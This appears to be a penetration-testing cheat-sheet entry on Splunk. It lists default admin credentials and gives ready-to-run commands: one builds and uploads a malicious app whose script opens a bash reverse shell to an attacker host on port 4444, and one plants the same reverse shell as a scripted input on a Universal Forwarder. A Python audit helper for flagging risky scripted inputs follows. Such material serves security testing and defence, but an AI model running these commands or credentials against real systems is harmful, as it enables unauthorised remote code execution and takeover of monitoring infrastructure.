Splunk
What it is: Enterprise SIEM and log analysis platform. The management interface allows installing custom apps, which can contain arbitrary Python or shell scripts. Admin access = RCE.
Default ports: 8000 (web), 8089 (management API)
Vuln research:
Default credentials
Splunk Free and trial installs often keep the default admin password
# admin:changeme
# admin:admin
curl -u admin:changeme https://$IP:8089/services/auth/login -k
Splunk RCE via custom app
Upload malicious app — Executes arbitrary code
# Create a malicious Splunk app:
mkdir -p splunk_shell/bin splunk_shell/default
printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/4444 0>&1\n' "$LHOST" > splunk_shell/bin/shell.sh   # printf: bash's echo does not expand \n, and $LHOST is not expanded inside single quotes
chmod +x splunk_shell/bin/shell.sh
cat > splunk_shell/default/inputs.conf << CONF
[script://./bin/shell.sh]
disabled = false
interval = 60
sourcetype = shell
CONF
tar -czf splunk_shell.tar.gz splunk_shell/
# Upload via: Apps → Manage Apps → Install App from File
# Or via API:
curl -k -u admin:changeme https://$IP:8089/services/apps/local -F name=splunk_shell -F filename=true -F update=true --data-binary @splunk_shell.tar.gz
Splunk Universal Forwarder
Management port 8089 — Often has default creds on forwarders
# Default: admin:changeme
# Forwarders can execute scripts:
curl -k -u admin:changeme https://$IP:8089/services/data/inputs/script -d name="/bin/bash -c 'bash -i >& /dev/tcp/$LHOST/4444 0>&1'" -d interval=60
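Both the custom-app install and the forwarder stanza above rely on the same mechanism: an enabled [script://...] stanza in inputs.conf that splunkd runs on a timer. The audit helper below is an added example, not code from the page or from Splunk; a reviewer can run it over an app package's default/inputs.conf or local/inputs.conf before installing it, or over a forwarder's configuration. The sample conf is constructed, and the flagging rules (scripts outside the app's bin/, a shell named as the script, intervals under 300 s) are assumptions chosen to match the patterns shown above.

```python
import re
from typing import Dict, List

INTERPRETER_RE = re.compile(r"(^|/)(bash|sh|zsh|dash|python\d*|perl)\b")


def parse_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal Splunk .conf parser: [stanza] headers and key = value lines."""
    stanzas: Dict[str, Dict[str, str]] = {}
    current = None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            stanzas.setdefault(current, {})
        elif "=" in line and current is not None and not line.startswith("#"):
            key, _, value = line.partition("=")
            stanzas[current][key.strip().lower()] = value.strip()
    return stanzas


def audit_inputs_conf(text: str) -> List[dict]:
    """One finding per [script://...] stanza, with the reasons it needs review."""
    findings = []
    for stanza, kv in parse_conf(text).items():
        if not stanza.startswith("script://"):
            continue
        path = stanza[len("script://"):]
        enabled = kv.get("disabled", "0").lower() not in {"1", "true", "t", "yes", "y"}
        interval = kv.get("interval", "")
        reasons = []
        if enabled:
            reasons.append("enabled scripted input (runs with splunkd's privileges)")
        if not path.startswith("./bin/"):  # an app's own scripts live in $APP/bin
            reasons.append("script path outside the app's bin/ directory")
        if INTERPRETER_RE.search(path):  # e.g. '/bin/bash -c ...' given as the script
            reasons.append("stanza invokes a shell or interpreter directly")
        if interval.isdigit() and int(interval) < 300:
            reasons.append(f"short interval ({interval}s)")
        findings.append({"stanza": stanza, "path": path, "enabled": enabled,
                         "interval": interval, "reasons": reasons})
    return findings


# Constructed sample: app stanza, forwarder-style shell stanza, harmless monitor.
SAMPLE_INPUTS_CONF = """[script://./bin/shell.sh]
disabled = false
interval = 60
[script:///bin/bash -c 'id']
interval = 60
[monitor:///var/log/syslog]
disabled = 0
"""
```

A finding with an empty reasons list is a disabled, in-app script on a long interval; anything else deserves a look at the script itself before the app goes in.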